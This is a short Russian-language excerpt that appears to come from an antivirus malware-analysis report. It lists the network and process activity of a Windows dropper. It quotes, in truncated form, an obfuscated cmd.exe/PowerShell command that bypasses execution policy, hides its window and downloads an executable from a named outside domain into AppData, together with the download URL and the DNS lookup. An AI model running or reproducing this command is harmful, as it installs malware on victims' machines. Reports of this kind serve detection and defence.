Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^E^r^sH^elL.^eX^E^ ^-ExEcU^Ti^ONPOL^ic^Y b^Yp^a^Ss^ -n^OP^Ro^FI^le^ -w^inDO^w^StY^le^ HIdD^E^N^ (^nEW^-^O^bJ^eCT ^S^Y^sTEM.^Net.webClI^e^NT^).DOwn^loA^dFI^le^('http://www.fapoe...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^E^r^sH^elL.^eX^E^ ^-ExEcU^Ti^ONPOL^ic^Y b^Yp^a^Ss^ -n^OP^Ro^FI^le^ -w^inDO^w^StY^le^ HIdD^E^N^ (^nEW^-^O^bJ^eCT ^S^Y^sTEM.^Net.webClI^e^NT^).DOwn^loA^dFI^le^('http://www.fapoe...' (со скрытым окном)